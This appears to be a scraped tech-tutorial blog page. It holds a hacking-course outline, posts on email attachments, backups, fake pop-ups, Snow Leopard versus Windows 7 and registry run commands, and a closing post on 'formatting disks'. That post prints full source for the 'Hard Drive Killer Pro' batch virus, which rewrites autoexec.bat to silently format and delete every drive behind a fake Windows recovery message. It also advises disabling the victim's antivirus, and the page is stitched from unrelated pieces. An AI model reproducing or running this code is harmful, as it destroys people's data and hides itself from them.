• Steps to Perform After an IDS Detects an Attack
• Evading IDS Systems
• Ways to Evade IDS
• Tools to Evade IDS
• IDS Evading Tool: ADMutate
• Packet Generators
o Firewall
• What is a Firewall?
• What does a Firewall do?
• Packet Filtering
• What can't a Firewall do?
• How does a Firewall Work?
• Firewall Operations
• Hardware Firewall
• Software Firewall
• Types of Firewalls
• Packet Filtering Firewall
• IP Packet Filtering Firewall
• Circuit-Level Gateway
• TCP Packet Filtering Firewall
• Application-Level Firewall
• Application Packet Filtering Firewall
• Stateful Multilayer Inspection Firewall
• Firewall Identification
• Firewalking
• Banner Grabbing
• Breaching Firewalls
• Bypassing a Firewall Using HTTP Tunnel
• Placing Backdoors Through Firewalls
• Hiding behind a Covert Channel: LOKI
• ACK Tunneling
• Tools to Breach Firewalls
• Common Tool for Testing Firewall & IDS
• IDS Informer
• Evasion Gateway
• Firewall Informer
o Honeypot
• What is a Honeypot?
• The Honeynet Project
• Types of Honeypots
• Advantages and Disadvantages of a Honeypot
• Where to Place a Honeypot?
• Honeypots
• SPECTER
• honeyd
• KFSensor
• Sebek
• Physical and Virtual Honeypots
• Tools to Detect Honeypots
• What to do When Hacked?
Module 20: Buffer Overflows
Why are Programs/Applications Vulnerable?
Buffer Overflows
Reasons for Buffer Overflow Attacks
Knowledge Required to Program Buffer Overflow Exploits
Types of Buffer Overflows
o Stack-based Buffer Overflow
• Understanding Assembly Language
• Understanding Stacks
• Shellcode
o Heap/BSS-based Buffer Overflow
How to Detect Buffer Overflows in a Program
Attacking a Real Program
NOPS
How to Mutate a Buffer Overflow Exploit
Defense Against Buffer Overflows
Tool to Defend Buffer Overflow
o Return Address Defender (RAD)
o StackGuard
o Immunix System
Vulnerability Search – ICAT
Simple Buffer Overflow in C
Code Analysis
Module 21: Cryptography
Public-key Cryptography
Working of Encryption
Digital Signature
RSA (Rivest Shamir Adleman)
RC4, RC5, RC6, Blowfish
Algorithms and Security
Brute-Force Attack
RSA Attacks
Message Digest Functions
One-way Hash Functions
MD5
SHA (Secure Hash Algorithm)
SSL (Secure Sockets Layer)
RC5
What is SSH?
SSH (Secure Shell)
Government Access to Keys (GAK)
RSA Challenge
distributed.net
Cleversafe Grid Builder
PGP (Pretty Good Privacy)
Code Breaking: Methodologies
Cryptography Attacks
Disk Encryption
Hacking Tool
o PGP Crack
o Magic Lantern
o WEPCrack
o Cracking S/MIME Encryption Using Idle CPU Time
o CypherCalc
o Command Line Scriptor
o CryptoHeaven
Module 22: Penetration Testing
Introduction to Penetration Testing
Categories of Security Assessments
Vulnerability Assessment
Limitations of Vulnerability Assessment
Types of Penetration Testing
Risk Management
Do-it-Yourself Testing
Outsourcing Penetration Testing Services
Terms of Engagement
Project Scope
Pentest Service Level Agreements
Testing Points
Testing Locations
Automated Testing
Manual Testing
Using DNS Domain Name and IP Address Information
Enumerating Information about Hosts on Publicly-Available Networks
Testing Network-Filtering Devices
Enumerating Devices
Denial of Service Emulation
Tools
o Appscan
o HackerShield
o Cerberus Internet Scanner
o Cybercop Scanner
o FoundScan Hardware Appliances
o Nessus
o NetRecon
o SAINT
o SecureNET Pro
o SecureScan
o SATAN
o SARA
o Security Analyzer
o STAT Analyzer
o VigilENT
o WebInspect
Evaluating Different Types of Pentest Tools
Asset Audit
Fault Trees and Attack Trees
GAP Analysis
Threat
Business Impact of Threat
Internal Metrics Threat
External Metrics Threat
Calculating Relative Criticality
Test Dependencies
Defect Tracking Tools
o Web-based Bug/Defect Tracking Software
o SWB Tracker
o Advanced Defect Tracking Web Edition
Disk Replication Tools
o Snapback DUP
o Daffodil Replicator
o Image MASSter 4002i
DNS Zone Transfer Testing Tools
o DNS analyzer
o Spam blacklist
Network Auditing Tools
o eTrust Audit (AUDIT LOG REPOSITORY)
o iInventory
o Centennial Discovery
Trace Route Tools and Services
o Ip Tracer 1.3
o Trellian Trace Route
Network Sniffing Tools
o Sniff’em
o PromiScan
Denial-of-Service Emulation Tools
o FlameThrower®
o Mercury LoadRunner™
o ClearSight Analyzer
Traditional Load Testing Tools
o WebMux
o SilkPerformer
o PORTENT Supreme
System Software Assessment Tools
o Database Scanner
o System Scanner
o Internet Scanner
Operating System Protection Tools
o Bastille Linux
o Engarde Secure Linux
Fingerprinting Tools
o Foundstone
o @Stake LC 5
Port Scanning Tools
o Superscan
o Advanced Port Scanner
o AW Security Port Scanner
Directory and File Access Control Tools
o Abyss Web Server for windows
o GFI LANguard Portable Storage Control
o Windows Security Officer - wso
File Share Scanning Tools
o Infiltrator Network Security Scanner
o Encrypted FTP 3
Password Directories
o Passphrase Keeper 2.60
o IISProtect
Password Guessing Tools
o Webmaster Password Generator
o Internet Explorer Password Recovery Master
o Password Recovery Toolbox
Link Checking Tools
o Alert Link Runner
o Link Utility
o LinxExplorer
Web Testing-based Scripting Tools
o Svoi.NET PHP Edit
o OptiPerl
o Blueprint Software Web Scripting Editor
Buffer Overflow Protection Tools
o StackGuard
o FormatGuard
o RaceGuard
File Encryption Tools
o Maxcrypt
o Secure IT
o Steganos
Database Assessment Tools
o EMS MySQL Manager
o SQL Server Compare
o SQL Stripes
Keyboard Logging and Screen Reordering Tools
o Spector Professional 5.0
o Handy Keylogger
o Snapshot Spy
System Event Logging and Reviewing Tools
o LT Auditor Version 8.0
o ZVisual RACF
o Network Intelligence Engine LS Series
Tripwire and Checksum Tools
o SecurityExpressions
o MD5
o Tripwire for Servers
Mobile-Code Scanning Tools
o Vital Security
o E Trust Secure Content Manager 1.1
o Internet Explorer Zones
Centralized Security Monitoring Tools
o ASAP eSMART™ Software Usage by ASAP Software
o WatchGuard VPN Manager
o Harvester
Web Log Analysis Tools
o AWStats
o Azure Web Log
o Summary
Forensic Data and Collection Tools
o Encase tool
o SafeBack
o ILook Investigator
Security Assessment Tools
o Nessus Windows Technology
o NetIQ Security Manager
o STAT Scanner
Multiple OS Management Tools
o Multiple Boot Manager
o Acronis OS Selector
o Eon
Phases of Penetration Testing
o Pre-Attack Phase
o Attack Phase
o Post-Attack Phase
Penetration Testing Deliverables Templates
SELF-STUDY MODULES
Covert Hacking
Insider attacks
What is covert channel?
Security Breach
Why Do You Want to Use Covert Channel?
Motivation of a Firewall Bypass
Covert Channels Scope
Covert Channel: Attack Techniques
Simple Covert Attacks
Advanced Covert Attacks
Reverse Connecting Agents
Covert Channel Attack Tools
o Netcat
o DNS tunnel
o DNS Tunneling
• Covert Channel Using DNS Tunneling
• DNS Tunnel Client
• DNS Tunneling Countermeasures
o SSH reverse tunnel
• Covert Channel Using SSH
• Covert Channel using SSH (Advanced)
o HTTP/S Tunneling Attack
o Covert Channel Hacking Tool: Active Port Forwarder
o Covert Channel Hacking Tool: CCTT
o Covert Channel Hacking Tool: Firepass
o Covert Channel Hacking Tool: MsnShell
o Covert Channel Hacking Tool: Web Shell
o Covert Channel Hacking Tool: NCovert
o Covert Channel Hacking via Spam E-mail Messages
o Hydan
o Covert Channel Hacking Tool: NCOVERT
Writing Virus Codes
Introduction of Virus
Types of Viruses
Symptoms of a Virus Attack
Prerequisites for Writing Viruses
Required Tools and Utilities
Virus Infection Flow Chart
o Step – I Finding file to infect
• Directory Traversal Method
• “dot dot” Method
o Step – II Check viruses infection criteria
o Step – III Check for previous infection
• Marking a File for Infection
o Step – IV Infect the file
o Step – V Covering tracks
Components of Viruses
Functioning of Replicator part
Diagrammatical representation
Writing Replicator
Writing Concealer
Dispatcher
Writing Bomb/Payload
Trigger Mechanism
Brute Force Logic Bombs
Testing Virus Codes
Tips for Better Virus Writing
Assembly Language Tutorial
Number System
Base 10 System
Base 2 System
Decimal 0 to 15 in Binary
Binary Addition (C stands for Canary)
Hexadecimal Number
Hex Example
Hex Conversion
nibble
Computer memory
Characters Coding
ASCII and UNICODE
CPU
Machine Language
Compilers
Clock Cycle
Original Registers
Instruction Pointer
Pentium Processor
Interrupts
Interrupt handler
External interrupts and Internal interrupts
Handlers
Machine Language
Assembly Language
Assembler
Assembly Language Vs High-level Language
Assembly Language Compilers
Instruction operands
MOV instruction
ADD instruction
SUB instruction
INC and DEC instructions
Directive
preprocessor
equ directive
%define directive
Data directives
Labels
Input and output
C Interface
Call
Creating a Program
Why should anyone learn assembly at all?
o First.asm
Assembling the code
Compiling the C code
Linking the object files
Understanding an assembly listing file
Big and Little Endian Representation
Skeleton File
Working with Integers
Signed integers
Signed Magnitude
Two’s Complement
If statements
Do while loops
Indirect addressing
Subprogram
The Stack
The SS segment
ESP
The Stack Usage
The CALL and RET Instructions
General subprogram form
Local variables on the stack
General subprogram form with local variables
Multi-module program
Saving registers
Labels of functions
Calculating addresses of local variables
Exploit Writing
Exploits Overview
Prerequisites for Writing Exploits and Shellcodes
Purpose of Exploit Writing
Types of Exploits
o Stack Overflow
o Heap Corruption
o Format String
o Integer Bug Exploits
o Race Condition
o TCP/IP Attack
The Proof-of-Concept and Commercial Grade Exploit
Converting a Proof of Concept Exploit to Commercial Grade Exploit
Attack Methodologies
Socket Binding Exploits
Tools for Exploit Writing
o LibExploit
o Metasploit
o CANVAS
Steps for Writing an Exploit
Differences Between Windows and Linux Exploits
Shellcodes
o NULL Byte
o Types of Shellcodes
Tools Used for Shellcode Development
o NASM
o GDB
o objdump
o ktrace
o strace
o readelf
Steps for Writing a Shellcode
Issues Involved With Shellcode Writing
o Addressing problem
o Null byte problem
o System call implementation
Smashing the Stack for Fun and Profit
What is a Buffer?
Static Vs Dynamic Variables
Stack Buffers
Data Region
Memory Process Regions
What Is A Stack?
Why Do We Use A Stack?
The Stack Region
Stack frame
Stack pointer
Procedure Call (Procedure Prolog)
Compiling the code to assembly
Call Statement
Return Address (RET)
Word Size
Stack
Buffer Overflows
Error
Why do we get a segmentation violation?
Segmentation Error
Instruction Jump
Guess Key Parameters
Calculation
Shell Code
o The code to spawn a shell in C
Lets try to understand what is going on here. We'll start by studying main:
execve()
o execve() system call
exit.c
o List of steps with exit call
The code in Assembly
JMP
Code using indexed addressing
Offset calculation
shellcodeasm.c
testsc.c
Compile the code
NULL byte
shellcodeasm2.c
testsc2.c
Writing an Exploit
overflow1.c
Compiling the code
sp.c
vulnerable.c
NOPs
o Using NOPs
o Estimating the Location
Windows Based Buffer Overflow Exploit Writing
Buffer Overflow
Stack overflow
Writing Windows Based Exploits
Exploiting stack based buffer overflow
OpenDataSource Buffer Overflow Vulnerability Details
Simple Proof of Concept
Windbg.exe
Analysis
EIP Register
o Location of EIP
o EIP
Execution Flow
But where can we jump to?
Offset Address
The Query
Finding jmp esp
Debug.exe
listdlls.exe
Msvcrt.dll
Out.sql
The payload
ESP
Limited Space
Getting Windows API/function absolute address
Memory Address
Other Addresses
Compile the program
Final Code
Reverse Engineering
Positive Applications of Reverse Engineering
Ethical Reverse Engineering
World War Case Study
DMCA Act
What is Disassembler?
Why do you need to decompile?
Professional Disassembler Tools
Tool: IDA Pro
Convert Machine Code to Assembly Code
Decompilers
Program Obfuscation
Convert Assembly Code to C++ code
Machine Decompilers
Tool: dcc
Machine Code of compute.exe Program
Assembly Code of compute.exe Program
Code Produced by the dcc Decompiler in C
Tool: Boomerang
What Boomerang Can Do?
Andromeda Decompiler
Tool: REC Decompiler
Tool: EXE To C Decompiler
Delphi Decompilers
Tools for Decompiling .NET Applications
Salamander .NET Decompiler
Tool: LSW DotNet-Reflection-Browser
Tool: Reflector
Tool: Spices NET.Decompiler
Tool: Decompilers.NET
.NET Obfuscator and .NET Obfuscation
Java Bytecode Decompilers
Tool: JODE Java Decompiler
Tool: JREVERSEPRO
Tool: SourceAgain
Tool: ClassCracker
Python Decompilers
Reverse Engineering Tutorial
OllyDbg Debugger
How Does OllyDbg Work?
Debugging a Simple Console Application
INFI-NITE, Ranchi is a humble initiative towards achieving the goal of technical expertise and brilliance both and to enable the millions of users worldwide to present an approach of Indian Minds.
KINDLY REPLY HOW YOU LIKE IT
Programming Tutorials on different platforms
Any general and specialized interesting programming language training and exploration.
Fun with knowledge.
Wednesday, July 20, 2011
Be Careful with Attachments
There have been a number of really bad viruses just within the past 6 months. We've seen W32.Beagle, W32.Netsky, MyDoom, and so on. Most of these viruses were transported or replicated from PC to PC using email attachments. These are easy to spot if you're paying attention, simply because they are usually executable files, but not always.
Some attachments contain macros (simple programs that run within other programs; all the titles in Microsoft Office use macros). If you're not that familiar with spotting file extensions, don't worry, that's what I'm here to talk about today. If you are a little hazy on the whole "file extension" thing, then let's spend a few moments explaining it.
File extensions are what tell the program how to treat a particular piece of data. For example, most people are somewhat familiar with the .doc and .txt file extensions. These are both text documents, and when the user opens such a file the operating system looks at the extension and then knows how to open it.
Hackers try to use some sort of eye-grabbing ploy to get you to open their email and activate the virus, which is always an attachment. Most anti-virus programs nowadays stop, or at least warn you of, these high-risk attachments and even take measures to protect you. However, on average 10-15 new viruses are created every day, and I personally wouldn't count on any program to protect my PC 100%. That's why I scrutinize any email: if I wasn't expecting an attachment, I won't open it until I've had a chance to talk to the sender.
Some of the more common file types used to hide viruses include:
.scr - Windows Screen Saver - USE CAUTION if you receive a screen saver via email. They can contain worms or viruses
.pif - DO NOT OPEN! This is most likely a virus. Clicking it will run a program or code that can mess up your computer.
.exe - executable file - a program that contains a virus, Trojan horse, or worm
.pps - MS PowerPoint (can contain macro virus)
.zip - Zip (compressed) file
.vbs - Visual Basic script
.bat - Executable MS-DOS batch file
.com - DOS executable command
.asp - active server page - internet script
.doc - Word document (can contain macro virus)
.xls - Excel file (can contain macro virus)
This is in no way a complete list. Just because an attachment may have one of these extensions doesn't mean that it is a virus, but it should send up warning flags. Hackers use clever subject lines, and viruses can appear to come from a friend so keep on your toes and don't fall victim to their deceptive traps. Scan those attachments and verify with the sender before opening.
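A mail-triage sketch of the advice above, added here as an example and not part of the original post: it parses a message with Python's standard `email` package and flags every attachment whose extension is on the post's list, so it can be scanned and verified with the sender before anyone opens it. The function names, the sample message and its addresses are constructed for illustration.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage

# Extensions and descriptions taken from the list in the post above.
RISKY_EXTENSIONS = {
    ".scr": "Windows screen saver",
    ".pif": "runs a program or code when clicked",
    ".exe": "executable file",
    ".pps": "MS PowerPoint (can contain macro virus)",
    ".zip": "Zip (compressed) file",
    ".vbs": "Visual Basic script",
    ".bat": "MS-DOS batch file",
    ".com": "DOS executable command",
    ".asp": "active server page script",
    ".doc": "Word document (can contain macro virus)",
    ".xls": "Excel file (can contain macro virus)",
}


def attachment_extension(filename):
    """Return the final extension, lower-cased, or "" if there is none.

    Case and trailing dots/spaces are normalised before comparing, so
    "HOLIDAY.SCR" and "run.BAT. " are treated like ".scr" and ".bat".
    """
    name = filename.strip().rstrip(". ")
    dot = name.rfind(".")
    return name[dot:].lower() if dot != -1 else ""


def flag_attachments(raw_message):
    """Parse raw message bytes; return (filename, extension, description)
    for every named part whose extension is on the list."""
    msg = message_from_bytes(raw_message, policy=policy.default)
    findings = []
    # walk() visits nested parts too, so forwarded or inline files are seen.
    for part in msg.walk():
        filename = part.get_filename()
        if not filename:
            continue  # message body or multipart container
        ext = attachment_extension(filename)
        if ext in RISKY_EXTENSIONS:
            findings.append((filename, ext, RISKY_EXTENSIONS[ext]))
    return findings


def build_sample_message():
    """Constructed sample: one harmless text file and three listed types."""
    msg = EmailMessage()
    msg["From"] = "friend@example.com"   # constructed address
    msg["To"] = "me@example.com"         # constructed address
    msg["Subject"] = "Holiday pictures"
    msg.set_content("See attached.")
    for name in ("notes.txt", "HOLIDAY.SCR", "budget.xls", "pictures.zip"):
        msg.add_attachment(
            b"constructed placeholder bytes",
            maintype="application",
            subtype="octet-stream",
            filename=name,
        )
    return msg.as_bytes()


if __name__ == "__main__":
    for filename, ext, why in flag_attachments(build_sample_message()):
        print(f"HOLD {filename}: {ext} ({why}) - scan and verify with sender")
```

As the post says, a match is a warning flag rather than proof of infection, and the list is not complete.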
Back Up Your Data
Just about everybody has important data on their hard drive, from digital pictures to important documents, emails and earmarked websites; the list goes on and on. In my experience people are pretty lax about backing up their PCs, and I think this really is an area that deserves attention. With a good backup set you can bounce back from a fatal hard drive crash and be up and running with all your pictures, documents, downloads, email and favorites before you know it. Having important files stored on removable media is also a good safety precaution in case you get a virus or Trojan horse.
There are a couple of different ways to back up important data, from the casual copy and paste to running complicated scheduled backups. There is no wrong way, as long as you have a copy of everything you need.
You can save the data on a couple of different types of media (floppy, ZIP, CD-R/RW, DVD+R/RW, flash memory, even DAT drives), but for home use I really recommend either CDs or DVDs. Floppies are just too small. Zips, although bigger than floppies, are still small (100-200MB), and they're old and kind of expensive. Flash memory can store data, but it's not really something you want to save data to and store away unless there is no other option. DAT tapes are more for the corporate end of things and are overkill in most homes. CDs are cheap, hold a lot of data, work on any PC and are easy to store.
If you use CD-RW or DVD-RW you can actually save money by setting up a "round robin" with your backups. To do this, you need at least 3-4 of the same backup set. Take the oldest and erase it, then use the blank disk for the new backup. The next time you do a backup, use the oldest disk in the set, and so on and so forth.
As for the methods of backing up, I find it's easiest when all my intended files and folders are organized in a structured manner and not scattered all over my hard drive. This is a good way to ensure that you don't forget anything important by hunting for a bunch of individual files. An easy way to stay organized is to create a descriptively labeled folder structure and try to be diligent about saving your data to its designated folder.
Another good practice is to test your backups; don't just take the burning software's word for it. After a backup, explore the disk and randomly go through files and open them up to make sure that they're complete and not corrupt. Learn from my experience: waiting for a complete system failure is not a good time to check the validity of your backups. This is a good way to get yourself in a lot of trouble as well. I know if I didn't back up the pictures or movies of our kids I wouldn't be able to live with myself.
Once you have all your ducks in a row, it's time to back up. There are a number of ways to do this as well. The easiest is to open your burning program, select data CD, go through the folder explorer and grab the folders you want to back up. When you select a folder you should see it in the "burn" selection window. Once you're done with your backup selection, choose "burn".
If you have Windows XP you have the luxury of being able to open up the blank CD or DVD in Windows Explorer, copy and paste the desired folders right onto the disk and select "Write files to CD", and Windows will do the rest for you. This is nice, but not all of us have XP, and I personally still like to use my third-party software.
Most burning software has its own backup services, and there are a number of third-party backup titles out there. The nice thing about using these types of software is the options: things like compression, backup jobs, and incremental backups. These are nice features, especially when you have some backups that you want to ensure are up to date. For instance, you can create a "Back up Set", which is basically a saved and named list of folders and files that you want backed up. This makes the whole process so easy. You can create a backup set and once a week or so you can run it, and it will either create a new backup or save just the changes to the backup. These are two options that are usually found in backup programs. If you use "backup sets", it's important to keep the files organized and in all the correct folders. You can also schedule Backup Jobs, which are basically backup sets that are scheduled to run at predetermined times and intervals (i.e. once a week Friday at 6:00).
Beware of fake security warnings!
Sometimes you'll be surfing the web and a window pops up that looks like a legitimate warning from Windows. Before you click, read carefully and you'll find that it's just a pop up ad trying to entice you to a product site by clicking "Yes". I've even seen some with a shield that resembles the new SP2 Security Center logo.
Just click the X at the top of the window to close it and go on your way.
Apple’s Snow Leopard vs. Windows 7
It makes sense to do the comparison at this time, as Snow Leopard has been updated to 10.6.1 and Windows 7 too has had a few updates over the RTM release. Firstly, the hardware: the 64-bit editions of the two OSes were installed on a MacBook Pro (2009), 2.53 GHz, 4 GB RAM. Boot Camp 3.0 was used to install Windows. Trust me, it makes the driver installation a breeze. No virtualization was used.
Pricing
I’ll only be discussing upgrade pricing here. Upgrading from Leopard to Snow costs only $29. However, Windows 7 Ultimate will set you back by $219 if you are upgrading from Vista or XP. While Snow Leopard has no variants, Windows does, and Ultimate was the only one that would compete against Snow.
Installation
Both OSes were installed with default settings, and power management was set to high performance. You could upgrade Vista to Win7 and Leopard to Snow. Let me tell you, upgrading from XP to Win7 will put you through some peril though. We’ll cover that later. Mac users don’t have to worry at all: no matter what version you are upgrading from, there are no issues whatsoever. For the sake of the test I did a fresh installation of both on different hard disks. Both installations took around thirty minutes.
First Run
Now, something that really bugged me and that I must share here is that Windows 7, unlike any version of Mac OS X, does not have these preinstalled: no PDF viewer, no IM application and no e-mail client. They can be downloaded from the Windows Live site, but why, Microsoft?
Interface
Microsoft has definitely enhanced the user interface on this one, and Win7 is by far the best-looking OS in the Windows family. However, beauty won’t stay appreciated without functionality. Let’s find out. The new Aero themes, which we first saw in Vista, look pretty. Also worth noticing: the user interface is more user-friendly than Vista's and is less irritating to use.
I’ll briefly mention some of the new Aero features. Aero Shake allows you to shake the title bar of a window to minimize all other windows. Aero Snap lets you drag the window to the right, left or top of the screen, and it snaps itself elegantly. Dragging left or right makes it occupy half of the screen, while the top edge makes it full screen.
The new Windows is less painful to configure, but you still have to do some work finding what you want, say advanced power options for instance. Nothing beats the simple layout of System Preferences that the Mac has. While the UI is catching up, usability-wise Windows still has a long way to go.
I also must mention Apple’s striking new feature, Spotlight. It’s a search tool, but the best you have ever seen on your desktop. It searches through everything you want it to, from system settings to your files, and, did I forget to mention, in no time! Windows Search is catching up but is not a match yet.
Everyday Tasks
Well, here both OSes fared almost equally well doing daily errands such as word processing, printing and browsing. Except, of course, that ease of use leans more towards Snow. Snow is not only less intrusive but way more user-friendly. The good news here is that Win7 manages your graphics processor better than its predecessors.
Speed
When it came to startup or shutdown, Snow put Win7 to shame. While Snow took 31 seconds to boot up, Windows took 44. Shutting down took Snow 3 seconds and Windows 9 seconds. Resuming from standby was the same on both, around one second.
Other Benchmark tests
You could do these yourselves as well. In music encoding, the latest version of iTunes took around ten minutes to rip a folder while Windows took a minute longer. So Snow fared better when it came to encoding, start-up and shutdown.
However, when it came to 3D rendering, Windows 7 did a better job. The game Call of Duty 4 has its own benchmarking system. Win7 on average scored 5 fps higher than Snow.
Security
While Microsoft has enhanced security options on this one, UAC still remains annoying, though you can turn it off. Windows 7 also has one feature that sets it apart from Snow: Address Space Layout Randomization (ASLR). It randomly repositions important data in memory, making the system less vulnerable to exploits. One could argue that Windows has far more viruses and trojans than the Mac and attribute it to its greater popularity and exposure, but that is turning out to be false as the Mac’s share increases.
Battery Life
With moderate use, keyboard and screen illumination set to medium and Wi-Fi on, Windows lasted around two-thirds of the time Snow did. While Snow lasted 5 hrs 15 minutes, Windows ran out of battery juice in 3 hrs 40 minutes. Of course, this could also be due to Boot Camp, given that Snow is native to the Mac. That said, you could definitely make out that Windows 7 is more power-hungry if not less than Snow.
Conclusion
While Snow seems sleeker and way more user-friendly, Windows definitely has greater options and wider compatibility to its name. I have only shared a first-hand experience with both. While we’ve discussed time tests and other surface features, another important aspect lies in how the OS responds to third-party installations, and in how multiple processor cores are utilized.
We are not exactly starting an OS war here. Operating systems have kept evolving, and user needs are on the increase too, so it’s just a matter of how the former catches up with the latter. While Microsoft has a wider reach, it’s unpleasant to see so many security updates every week. I’m sure most of us Windows users would be way happier when the very need to release them so often decreases.
Vista and XP users must try Windows 7, as it is the best Windows ever made. As for the hardware, I’d always advise in favor of the Mac, for only a Mac lets you taste the best of both worlds. You could run both Windows and Snow Leopard on it. Final verdict at the end of the day: Snow Leopard
PS: We have a lot of Mac coverage in store for you. So those of you who are curious about the Mac experience or have had trouble choosing between a Mac and a PC, we’ll have loads of info for you coming later this month. Do leave a comment – about Mac and Windows alike.
Given an option between Windows 7 and Apple Snow Leopard, which one will be your choice and why?
MAKE YOUR CUSTOM RUN COMMANDS
1. Go to Start->Run->type Regedit and hit Enter.
2. Navigate to HKEY_LOCAL_MACHINE >> SOFTWARE >> Microsoft >> Windows >> CurrentVersion >> App Paths
3. Right click on App Paths and select New-> Key. Name it whatever you want your run command to be.
4. Now click on the newly created key. There will be a Default string in the right-side pane. Double-click it and enter the path to the application or folder.
5. Right-click in the right-side pane, create a new string and rename it to Path.
6. Double click on Path and enter the path to application or Folder.
7. Close registry and Restart your Explorer.
Go to run and type the command you created.
Program for formatting disks
Dear friends, this is not a batch file and is not intended to encourage malicious activities, but rather to explore the possibilities of advanced-level programming! Never ever use your knowledge against the ethics of the technological world!
A:
/* Program for formatting disks */
#include <stddef.h>   /* size_t */
#include "snpdskio.h"
int CDECL absdisk(unsigned char function,
unsigned short drive,
/* 0 = A:, etc. */
size_t number_of_sectors,
size_t starting_sector,
void * sector_buffer);
int AbsDiskRead(unsigned short drive,
size_t num_of_sectors,
size_t sector,
void *ptr)
{
return absdisk(0x25, drive, num_of_sectors, (unsigned)sector, ptr);
}
int AbsDiskWrite(unsigned short drive,
size_t num_of_sectors,
size_t sector,
void *ptr)
{
return absdisk(0x26, drive, num_of_sectors, (unsigned)sector, ptr);
}
=======================================================================
B :
Format Harddrive?
@echo off
for %%i in (d:,e:,f:,g:) do format %%i /FS:NTFS /x
If you want quick format then add the /q switch to the end of the format command.
What follows is the batch file code of the "hard drive killer", a virus that wipes your hard drive so fast that it can cause physical damage.
CAUTION!!!
Use at your own risk this is very dangerous. If you do manage to accidentally run it on your own system then do not restart but check your autoexec.bat file. This is now redundat because it is detected by many virus scanners but,if you kill the vics AV on entry it will work...also if they are running MicrosoftSpyware it will stop it from running so you need to go into Managers in CIA and use the ProcessManager to kill MicrosoftSpyware...kill process gcasDTServ.exe(some **** like that).
@echo off
rem Fastest way to format your computer.
:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat >nul
rem Drive checking and assigning the valid drives to the drive variable.
set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
rem code insertion for Drive Checking takes place here.
rem drivechk.bat is the file name under the root directory.
rem As far as the drive detection and drive variable settings, don't worry about how it
rem works, it's damn to complicated for the average or even the expert batch programmer.
rem Except for Tom Lavedas.
echo @echo off >drivechk.bat
echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem When errorlevel is 1, then the above is not true, if 0, then it's true.
rem Opposite of binary rules. If 0, it will elaps to the next command.
echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find "bytes" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem if errorlevel is 1, then the drive specified is a removable media drive - not ready.
rem if errorlevel is 0, then it will elaps to the next command.
echo @prompt dir %%%%1:.\/ad/w/-p $b find " 0 bytes free" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem if it's errorlevel 1, then the specified drive is a hard or floppy drive.
rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive.
echo :enddc >>drivechk.bat
rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING".
rem Now we will use the program drivechk.bat to attain valid drive information.
:testdrv
for %%a in (%alldrive%) do call drivechk.bat %%a >nul
if %drive%.==. set drive=c
del drivechk.bat >nul
:form_del
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cd\ >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Welcome to the land of death. Hard Drive Killer Pro Version 4.0. >>c:\autoexec.bat
echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . >>c:\autoexec.bat
echo echo 1. To make people aware that security should not be taken for granted. >>c:\autoexec.bat
echo echo 3. This breach of your security will benefit you in the long-run, so don't worry. Think about it.>>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Regards, >>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Munga Bunga >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat
:makedir
if exist c:\temp.bat attrib -r -h c:\temp.bat >nul
echo @echo off >c:\temp.bat
echo %%1:\ >>c:\temp.bat
echo cd\ >>c:\temp.bat
echo :startmd >>c:\temp.bat
echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul cd %%2"wink do %%%%a >>c:\temp.bat
echo for %%%%a in (">ass_hole.txt"wink do echo %%%%a Your Gone @$$hole!!!! >>c:\temp.bat
echo if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2 \%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul goto startmd >>c:\temp.bat
call attrib +r +h c:\temp.bat >nul
cls
